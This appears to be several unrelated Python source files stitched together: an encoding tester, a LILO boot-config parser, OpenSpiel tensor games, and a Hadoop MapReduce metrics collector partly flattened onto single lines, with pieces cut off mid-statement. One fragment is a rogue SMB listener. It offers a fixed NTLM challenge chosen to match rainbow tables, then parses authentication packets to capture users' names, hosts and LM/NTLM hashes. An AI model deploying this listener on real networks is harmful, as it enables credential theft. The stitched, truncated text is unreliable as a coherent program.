    # Write the results to a new text file next to the input file.
    # FIX: open the output explicitly with *final_encoding* (the original
    # used the locale default encoding on Python 3 and wrote raw bytes on
    # Python 2), and write codec name + decoded line in a single call so a
    # failed encode cannot leave a dangling codec-name column behind.
    fpath = os.path.abspath(filename)
    newfilename = fpath + '.encodings'
    print("\nWriting successfully tested encodings in " + newfilename)
    c = 0
    with io.open(newfilename, 'w', encoding=final_encoding) as out:
        for enc in sorted(data.keys()):
            try:
                out.write(u"%-20s%s%s" % (enc, data[enc], os.linesep))
                c += 1
            except Exception:
                print("Cannot encode " + enc + " to " + final_encoding)

    print("\n" + str(c) + " out of " + str(len(encodings)) +
          " tested encodings were written.\n")


if __name__ == '__main__':
    nargs = len(sys.argv) - 1
    if nargs < 1 or nargs > 2:
        # FIX: use sys.exit; the builtin exit() is provided by the site
        # module and is not guaranteed to exist.
        sys.exit("Usage: test_encodings.py filename [number of line to test]")
    if nargs == 2:
        line_number = int(sys.argv[2])
    else:
        line_number = 1
    write_encodings(sys.argv[1], line_number, 'utf_8')
#
# LiloConf.py -- parser for LILO boot-loader configuration files,
# modelled on (and reusing helpers from) GrubConf.
# NOTE: this module is Python 2 code (print statements, `raise E, msg`,
# dict.has_key); it will not run unmodified on Python 3.
#

import sys, re, os
import logging
import GrubConf


class LiloImage(object):
    """One `image` stanza of a lilo.conf: title, kernel, initrd, args."""

    def __init__(self, lines, path):
        self.reset(lines, path)

    def __repr__(self):
        return ("title: %s\n"
                " root: %s\n"
                " kernel: %s\n"
                " args: %s\n"
                " initrd: %s\n" %(self.title, self.root, self.kernel,
                                  self.args, self.initrd))

    def reset(self, lines, path):
        # Re-initialize all fields, then replay every config line.
        self._initrd = self._kernel = self._readonly = None
        self._args = ""
        self.title = ""
        self.lines = []
        self.path = path
        self.root = ""
        # Py2 map() is eager, so this applies set_from_line to each line.
        map(self.set_from_line, lines)

    def set_from_line(self, line, replace = None):
        """Apply one config line; optionally replace the stored line at
        index `replace` instead of appending."""
        (com, arg) = GrubConf.grub_exact_split(line, 2)

        if self.commands.has_key(com):
            if self.commands[com] is not None:
                # Strip surrounding double quotes from the value.
                setattr(self, self.commands[com],
                        re.sub('^"(.+)"$', r"\1", arg.strip()))
            else:
                logging.info("Ignored image directive %s" %(com,))
        else:
            logging.warning("Unknown image directive %s" %(com,))

        # now put the line in the list of lines
        if replace is None:
            self.lines.append(line)
        else:
            self.lines.pop(replace)
            self.lines.insert(replace, line)

    # kernel/initrd values are stored as (None, absolute-path) tuples,
    # prefixing the configured path.
    def set_kernel(self, val):
        self._kernel = (None, self.path + "/" + val)
    def get_kernel(self):
        return self._kernel
    kernel = property(get_kernel, set_kernel)

    def set_initrd(self, val):
        self._initrd = (None, self.path + "/" + val)
    def get_initrd(self):
        return self._initrd
    initrd = property(get_initrd, set_initrd)

    def set_args(self, val):
        self._args = val
    def get_args(self):
        # Fold root= and ro into the kernel command line on read.
        args = self._args
        if self.root:
            args += " root=" + self.root
        if self.readonly:
            args += " ro"
        return args
    args = property(get_args, set_args)

    def set_readonly(self, val):
        # Any `read-only` directive marks the image read-only; the value
        # itself is ignored.
        self._readonly = 1
    def get_readonly(self):
        return self._readonly
    readonly = property(get_readonly, set_readonly)

    # set up command handlers: lilo directive -> attribute name
    # (None means "recognized but ignored").
    commands = { "label": "title",
                 "root": "root",
                 "rootnoverify": "root",
                 "image": "kernel",
                 "initrd": "initrd",
                 "append": "args",
                 "read-only": "readonly",
                 "chainloader": None,
                 "module": None}


class LiloConfigFile(object):
    """Whole lilo.conf: global directives plus a list of LiloImage stanzas."""

    def __init__(self, fn = None):
        self.filename = fn
        self.images = []
        self.timeout = -1
        self._default = 0

        if fn is not None:
            self.parse()

    def parse(self, buf = None):
        """Parse self.filename (or the given string buffer) into images and
        top-level attributes."""
        if buf is None:
            if self.filename is None:
                raise ValueError, "No config file defined to parse!"

            f = open(self.filename, 'r')
            lines = f.readlines()
            f.close()
        else:
            lines = buf.split("\n")

        path = os.path.dirname(self.filename)
        img = []
        for l in lines:
            l = l.strip()
            # skip blank lines
            if len(l) == 0:
                continue
            # skip comments
            if l.startswith('#'):
                continue
            # new image stanza: flush any stanza being accumulated
            if l.startswith("image"):
                if len(img) > 0:
                    self.add_image(LiloImage(img, path))
                img = [l]
                continue

            # inside an image stanza, lines accumulate into img
            if len(img) > 0:
                img.append(l)
                continue

            # otherwise this is a global directive
            (com, arg) = GrubConf.grub_exact_split(l, 2)
            if self.commands.has_key(com):
                if self.commands[com] is not None:
                    setattr(self, self.commands[com], arg.strip())
                else:
                    logging.info("Ignored directive %s" %(com,))
            else:
                logging.warning("Unknown directive %s" %(com,))

        # flush the final stanza
        if len(img) > 0:
            self.add_image(LiloImage(img, path))

    def add_image(self, image):
        self.images.append(image)

    def _get_default(self):
        # NOTE(review): range(0, len - 1) never examines the LAST image,
        # so a default label matching only the last image falls through to
        # return 0 -- looks like an off-by-one; confirm intent.
        for i in range(0, len(self.images) - 1):
            if self.images[i].title == self._default:
                return i
        return 0
    def _set_default(self, val):
        self._default = val
    default = property(_get_default, _set_default)

    # NOTE: the values are dotted names ("self.default"), unlike LiloImage;
    # setattr(self, "self.default", ...) creates an oddly named attribute
    # rather than setting `default` -- presumably mirroring GrubConf's
    # convention; verify against GrubConf.
    commands = { "default": "self.default",
                 "timeout": "self.timeout",
                 "prompt": None,
                 "relocatable": None,
                 }


if __name__ == "__main__":
    # NOTE(review): `sys.argv < 2` compares a list with an int (always
    # False on Py2), so the usage error never triggers; probably meant
    # `len(sys.argv) < 2`.
    if sys.argv < 2:
        raise RuntimeError, "Need a grub.conf to read"
    g = LiloConfigFile(sys.argv[1])
    for i in g.images:
        print i #, i.title, i.root, i.kernel, i.args, i.initrd
    print g.default
# Copyright 2019 DeepMind Technologies Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Lint as: python3
"""Big tensor games."""

from absl import logging  # pylint:disable=unused-import

import numpy as np

from open_spiel.python.algorithms.adidas_utils.helpers import misc


class TensorGame(object):
  """Tensor Game."""

  def __init__(self, pt, seed=None):
    """Ctor. Inits payoff tensor (players x actions x ... np.array).

    Args:
      pt: payoff tensor, np.array
      seed: seed for random number generator, used if computing best responses

    Raises:
      ValueError: if the payoff tensor contains negative values.
    """
    if np.any(pt < 0.):
      raise ValueError("Payoff tensor must contain non-negative values")
    self.pt = pt

    self.seed = seed
    self.random = np.random.RandomState(seed)

  def num_players(self):
    """Number of players (leading axis of the payoff tensor)."""
    return self.pt.shape[0]

  def num_strategies(self):
    """Tuple of per-player strategy counts (trailing axes of the tensor)."""
    return self.pt.shape[1:]

  def payoff_tensor(self):
    return self.pt

  def get_payoffs_for_strategies(self, policies):
    """Return vector of payoffs for all players given list of strategies.

    Args:
      policies: list of integers indexing strategies for each player

    Returns:
      np.array (length num players) of payoffs
    """
    return self.pt[tuple([slice(None)] + policies)]

  def best_response(self, mixed_strategy, return_exp=False):
    """Return best response and its superiority over the current strategy.

    Args:
      mixed_strategy: np.ndarray (distribution over strategies)
      return_exp: bool, whether to return how much best response exploits the
        given mixed strategy (default is False)

    Returns:
      br: int, index of strategy (ties split randomly)
      exp: u(br) - u(mixed_strategy)
    """
    # FIX: logging.warn is a deprecated alias of logging.warning.
    logging.warning("Assumes symmetric game! Returns br for player 0.")
    # Reduce the payoff tensor for player 0 against everyone playing
    # mixed_strategy, leaving player 0's own action axis free.
    gradient = misc.pt_reduce(self.pt[0],
                              [mixed_strategy] * self.num_players(),
                              [0])
    br = misc.argmax(self.random, gradient)
    exp = gradient.max() - gradient.dot(mixed_strategy)
    if return_exp:
      return br, exp
    else:
      return br

  def best_population_response(self, dist, policies):
    """Returns the best response to the current population of policies.

    Args:
      dist: np.ndarray, distribution over policies
      policies: list of integers indexing strategies for each player

    Returns:
      best response, exploitability tuple (see best_response)
    """
    ns = self.num_strategies()
    # Aggregate the population into a single mixed strategy before
    # computing the (symmetric-game) best response.
    mixed_strat = np.zeros(ns)
    for pure_strat, prob in zip(policies, dist):
      mixed_strat[pure_strat] += prob
    return self.best_response(mixed_strat)


class ElFarol(TensorGame):
  """N-Player, 2-Action symmetric game with unique symmetric Nash."""

  def __init__(self, n=2, c=0.5, B=0, S=1, G=2, seed=None):
    """Ctor. Initializes payoff tensor (N x (2,) * N np.array).

    See Section 3.1, The El Farol Stage Game in
    http://www.econ.ed.ac.uk/papers/id186_esedps.pdf

    action 0: go to bar
    action 1: avoid bar

    Args:
      n: int, number of players
      c: float, threshold for `crowded' as a fraction of number of players
      B: float, payoff for going to a crowded bar
      S: float, payoff for staying at home
      G: float, payoff for going to an uncrowded bar
      seed: seed for random number generator, used if computing best responses
    """
    assert G > S > B, "Game parameters must satisfy G > S > B."
    pt = np.zeros((n,) + (2,) * n)
    for idx in np.ndindex(pt.shape):
      p = idx[0]
      a = idx[1:]
      a_i = a[p]
      go_to_bar = (a_i < 1)
      # Number of OTHER players going to the bar (actions are 0 = go),
      # compared against the crowding threshold c * n.
      crowded = (n - 1 - sum(a) + a_i) >= (c * n)
      if go_to_bar and not crowded:
        pt[idx] = G
      elif go_to_bar and crowded:
        pt[idx] = B
      else:
        pt[idx] = S
    super().__init__(pt, seed)
    1122334455667788, for which plenty of generated rainbow tables exist
    already.
    """

    # parse NTLM/LM hashes
    # scapy has very limited SMB packet support, so we have to do this manually
    def parse_credentials(self, data):
        """Pull LM/NTLM hash, host name and user name out of an NTLMSSP AUTH
        blob and record them in self.captured_hashes (keyed by user name)."""
        # offsets based on security blob starting at data[59]
        data = data[59:]
        # Field offsets/lengths inside the NTLMSSP_AUTH message header.
        lm_offset = struct.unpack('<I', data[16:20])[0]
        ntlm_offset = struct.unpack('<I', data[24:28])[0]
        name_length = struct.unpack('<h', data[36:38])[0]
        name_offset = struct.unpack('<I', data[40:44])[0]
        host_length = struct.unpack('<h', data[46:48])[0]
        host_offset = struct.unpack('<I', data[48:52])[0]
        lm_hash = ntlm_hash = ''

        # LM hash: 24 response bytes rendered as zero-padded hex.
        # NOTE(review): `len(tmp) is 1` is an identity comparison with an
        # int literal; works on CPython (small-int cache) but should be ==.
        for i in data[lm_offset:lm_offset + 24]:
            tmp = str(hex(ord(i))).replace('0x', '')
            if len(tmp) is 1:
                # hex() removes leading 0's in hex; we need them.
                tmp = '0' + tmp
            lm_hash += tmp

        # NTLM hash: same 24-byte hex rendering.
        for i in data[ntlm_offset:ntlm_offset + 24]:
            tmp = str(hex(ord(i))).replace('0x', '')
            if len(tmp) is 1:
                tmp = '0' + tmp
            ntlm_hash += tmp

        # host name (UTF-16LE on the wire; NUL bytes are skipped).
        # NOTE(review): `tmp is '\x00'` relies on string interning; == is
        # the safe comparison.
        hname = ''
        for i in range(host_offset, (host_offset + host_length)):
            tmp = struct.unpack('<c', data[i])[0]
            if tmp is '\x00':
                continue
            hname += tmp

        if name_length > 100:
            # sanity
            return

        # user name (same UTF-16LE / NUL-skipping treatment)
        uname = ''
        for i in range(name_offset, (name_offset + name_length)):
            tmp = struct.unpack('<c', data[i])[0]
            if tmp is '\x00':
                # null bytes
                continue
            uname += tmp

        # add the username and build the list
        # list consists of
        #   HOST NAME
        #   LM HASH
        #   NTLM HASH
        if not uname in self.captured_hashes:
            tmp = [hname, lm_hash.upper(), ntlm_hash.upper()]
            self.captured_hashes[uname] = tmp
            data = 'Username: %s\nHost: %s\nLM: %s\nNTLM: %s\nChallenge: %s\n' \
                % (uname, hname, lm_hash.upper(), ntlm_hash.upper(),
                   '1122334455667788')
            self.log_msg(data)

    # get packet payload
    def get_payload(self, data):
        """Build the canned SMB response for an incoming request.

        Returns (payload, err): payload is the raw bytes to send (or None),
        err 1 means the connection should be closed after sending.
        """
        # data[4] is the SMB command byte (after the 4-byte NetBIOS header
        # was stripped by handler()).
        hexcode = str(hex(ord(data[4])))
        if hexcode == '0x72':
            # Build the payload for a Negotiate Protocol Response
            # netbios
            payload = "\x00\x00\x00\x55"
            # smb header
            payload += "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x53\xc8"
            payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            payload += "\xff\xff\xff\xfe\x00\x00\x00\x00"
            # negotiate protocol response
            payload += "\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00"
            payload += "\x00\x00\x01\x00\x00\x00\x00\x00\xfd\xe3\x00\x80"
            payload += "\x11\xb9\x14\xe4\x77\xc8\xcd\x01\x68\x01\x00\x10"
            payload += "\x00\xb5\x9b\x73\x9d\xb7\xc2\xb7\x40\x83\xd6\x52"
            payload += "\x31\xec\xb3\x84\x53"
            return (payload, 0)
        elif hexcode == '0x73':
            # check if its a NEGOTIATE or AUTH
            message_type = str(hex(ord(data[67])))
            if message_type == '0x1':
                # Build the payload for a NTLMSSP_CHALLENGE
                # netbios
                payload = "\x00\x00\x00\xdd"
                # smb header
                payload += "\xff\x53\x4d\x42\x73\x16"
                payload += "\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00\x00"
                payload += "\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
                payload += "\x00\x08\x10\x00"
                # session setup andx response, error more processing
                payload += "\x04\xff\x00\xdd\x00\x00\x00\x68\x00\xb2\x00"
                payload += "\x4e\x54\x4c\x4d\x53\x53\x50\x00\x02\x00\x00"
                payload += "\x00\x04\x00\x04\x00\x38\x00\x00\x00\x15\x82"
                payload += "\x8a\xe2\x11\x22\x33\x44\x55\x66\x77\x88\x00"  #ntlm challenge 1122334455667788
                payload += "\x00\x00\x00\x00\x00\x00\x00\x2c\x00\x2c\x00"
                payload += "\x3c\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00"
                payload += "\x0f\x4e\x00\x4f\x00\x02\x00\x04\x00\x4e\x00"
                payload += "\x4f\x00\x01\x00\x04\x00\x4e\x00\x4f\x00\x04"
                payload += "\x00\x04\x00\x6e\x00\x6f\x00\x03\x00\x04\x00"
                payload += "\x6e\x00\x6f\x00\x06\x00\x04\x00\x01\x00\x00"
                payload += "\x00\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e"
                payload += "\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00"
                payload += "\x35\x00\x2e\x00\x31\x00\x00\x00\x57\x00\x69"
                payload += "\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00"
                payload += "\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20"
                payload += "\x00\x4c\x00\x41\x00\x4e\x00\x20\x00\x4d\x00"
                payload += "\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72"
                payload += "\x00\x00"
                return (payload, 0)
            elif message_type == '0x3':
                # should be an AUTH packet
                # parse credentials
                self.parse_credentials(data)
                # send a STATUS_LOGIN_FAILURE
                # netbios
                payload = "\x00\x00\x00\x23"
                # smb header
                payload += "\xff\x53\x4d\x42\x73\x6d\x00\x00\xc0\x98\x07"
                payload += "\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                payload += "\x00\x00\xff\xff\xff\xfe\x00\x08\x20\x00"
                # session setup andx response, status_login_failure
                payload += "\x00\x00\x00"
                return (payload, 1)
        else:
            return (None, 1)

    # dbg -- dump the packet as 16-byte rows of hex
    def dbg_dump(self, data):
        cnt = 0
        for i in data:
            sys.stdout.write(str(hex(ord(i))) + ' ')
            cnt += 1
            if cnt % 16 == 0:
                print ''
                cnt = 0
        print ''

    # handle packets: strip the NetBIOS header, send the canned response.
    # Returns False when the connection should be dropped.
    def handler(self, con, data):
        try:
            if len(data) > 4:
                data = data[4:]
                (payload, err) = self.get_payload(data)
                # NOTE(review): `err is 0` / `err is 1` are identity
                # comparisons with int literals; should be ==.
                if not payload is None and err is 0:
                    con.send(payload)
                elif not payload is None and err is 1:
                    con.send(payload)
                    return False
                else:
                    return False
        except Exception, j:
            util.Error('SMB error: %s' % j)
            return False
        return True

    # threaded init: run initialize() on a background thread
    def initialize_bg(self):
        util.Msg('Starting SMB listener...')
        thread = Thread(target=self.initialize)
        thread.start()
        return True

    # initialize SMB listener: accept loop feeding handler() per connection
    def initialize(self):
        socker = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        socker.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        socker.settimeout(3)
        socker.bind(('', self.config['port'].value))
        socker.listen(5)
        self.running = True
        try:
            while self.running:
                try:
                    con, addr = socker.accept()
                except KeyboardInterrupt:
                    break
                except:
                    # accept() timeout (3s) or transient error; keep polling
                    continue
                self.log_msg('Connection from %s' % addr[0])
                while self.running:
                    data = con.recv(256)
                    if not self.handler(con, data):
                        break
                con.shutdown(socket.SHUT_RDWR)
                con.close()
                self.log_msg('Closed connection with %s.\n' % addr[0])
        except KeyboardInterrupt:
            self.running = False
        except socket.error:
            pass
        except Exception, j:
            util.Error('Error with SMB listener: %s' % j)
            self.running = Fa
"reducesPending": 1, # "reducesRunning": 0, # "uberized": false, # "diagnostics": "", # "newReduceAttempts": 1, # "runningReduceAttempts": 0, # "failedReduceAttempts": 0, # "killedReduceAttempts": 0, # "successfulReduceAttempts": 0, # "newMapAttempts": 0, # "runningMapAttempts": 1, # "failedMapAttempts": 1, # "killedMapAttempts": 0, # "successfulMapAttempts": 0 # } # ] # } # } JOB = ['elapsedTime', 'mapsTotal', 'mapsCompleted', 'reducesTotal', 'reducesCompleted', 'mapsPending', 'mapsRunning', 'reducesPending', 'reducesRunning', 'newReduceAttempts', 'runningReduceAttempts', 'failedReduceAttempts', 'killedReduceAttempts', 'successfulReduceAttempts', 'newMapAttempts', 'runningMapAttempts', 'failedMapAttempts', 'killedMapAttempts', 'successfulMapAttempts'] # form 'http://localhost:8088/proxy/application_1453738555560_0001/ws/v1/mapreduce/jobs/application_1453738555560_0001/counters' # { # "jobCounters": { # "id": "job_1453738555560_0001", # "counterGroup": [ # { # "counterGroupName": "org.apache.hadoop.mapreduce.FileSystemCounter", # "counter": [ # { # "name": "FILE_BYTES_READ", # "totalCounterValue": 0, # "mapCounterValue": 1, # "reduceCounterValue": 2 # }, # { # "name": "FILE_BYTES_WRITTEN", # "totalCounterValue": 3, # "mapCounterValue": 4, # "reduceCounterValue": 5 # } # ] # } # ] # } # } JOB_COUNTER = ['reduceCounterValue', 'mapCounterValue', 'totalCounterValue'] # form 'http://localhost:8088/proxy/application_1453738555560_0001/ws/v1/mapreduce/jobs/application_1453738555560_0001/tasks' # { # "tasks": { # "task": [ # { # "startTime": 1453761318527, # "finishTime": 0, # "elapsedTime": 99869037, # "progress": 49.11076, # "id": "task_1453738555560_0001_m_000000", # "state": "RUNNING", # "type": "MAP", # "successfulAttempt": "", # "status": "map > map" # } # ] # } # } class MapReduce(CollectorBase): def __init__(self, config, logger, readq): super(MapReduce, self).__init__(config, logger, readq) self.port = self.get_config('port', 8080) self.host = 
self.get_config('host', "localhost") self.http_prefix = 'http://%s:%s' % (self.host, self.port) def __call__(self): try: running_apps = self._get_running_app_ids() running_jobs = self._mapreduce_job_metrics(running_apps) self._mapreduce_job_counters_metrics(running_jobs) self._mapreduce_task_metrics(running_jobs) self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '0')) except Exception as e: self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1')) self.log_exception('exception collecting mapreduce metrics %s' % e) def _get_running_app_ids(self): try: running_apps = {} metrics_json = self.request("/%s?%s" % (REST_API['YARN_APPS_PATH'], "states=RUNNING&applicationTypes=MAPREDUCE")) if metrics_json.get('apps'): if metrics_json['apps'].get('app') is not None: for app_json in metrics_json['apps']['app']: app_id = app_json.get('id') tracking_url = app_json.get('trackingUrl') app_name = app_json.get('name') if app_id and tracking_url and app_name: running_apps[app_id] = (app_name, tracking_url) except Exception as e: self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1')) self.log_exception('exception collecting yarn apps metric for mapreduce \n %s',e) return running_apps def _mapreduce_job_metrics(self, running_apps): ''' Get metrics for e
ach MapReduce job. Return a dictionary for each MapReduce job { job_id: { 'job_name': job_name, 'app_name': app_name, 'user_
name': user_name, 'tracking_url': tracking_url } ''' try: running_jobs = {} for app_id, (app_name, tracking_url) in running_apps.iteritems(): ts = time.time() metrics_json = self.request_url("%s%s" % (tracking_url,REST_API['MAPREDUCE_JOBS_PATH'])) if metrics_json.get('jobs'): if metrics_json['jobs'].get('job'): for job_json in metrics_json['jobs']['job']: job_id = job_json.get('id') job_name = job_json.get('name') user_name = job_json.get('user') if job_id and job_name and user_name: # Build the structure to hold the information for each job ID running_jobs[str(job_id)] = {'job_name': str(job_name), 'app_name': str(app_name), 'user_name': str(user_name), 'tracking_url': "%s%s/%s" % (tracking_url, REST_API['MAPREDUCE_JOBS_PATH'], job_id)} for metric in JOB: self._readq.nput('mapreduce.job.%s %d %d app_name=%s user_name=%s job_name=%s' % (metric, ts, job_json[metric], utils.remove_invalid_characters(str(app_name)), utils.remove_invalid_characters(str(user_name)), utils.remove_invalid_characters(str(job_name)))) except Exception as e: self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1')) self.log_exception('exception collecting mapreduce jobs metric \n %s',e) return running_jobs def _mapreduce_job_counters_metrics(self, running_jobs): ''' Get custom metrics specified for each counter ''' try: for job_id, job_metrics in running_jobs.iteritems(): ts = time.time() job_name = job_metrics['job_name'] if job_name: metrics_json = self.request_url("%s%s" % (job_metrics['tracking_url'],'/counters')) if metrics_json.get('jobCounters'): if metrics_json['jobCounters'].get('counterGroup'): for counter_group in metrics_json['jobCounters']['counterGroup']: group_name = counter_group.get('counterGroupName') if group_name: if counter_group.get('counter'): for counter in counter_group['counter']: counter_name = counter.get('name') for metric in JOB_COUNTER: self._readq.nput('mapreduce.job.counter.%s %d %d app_name=%s user_name=%s job_name=%s counter_name=%s' % (metric, 
ts, counter[metric], utils.remove_invalid_characters(job_metrics.get('app_name')), utils.remove_invalid_characters(job_metrics.get('user_name')), utils.remove_invalid_characters(job_name), utils.remove_invalid_characters(str(counter_name).lower()))) except Exception as e: self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1')) self.log_exception('exception co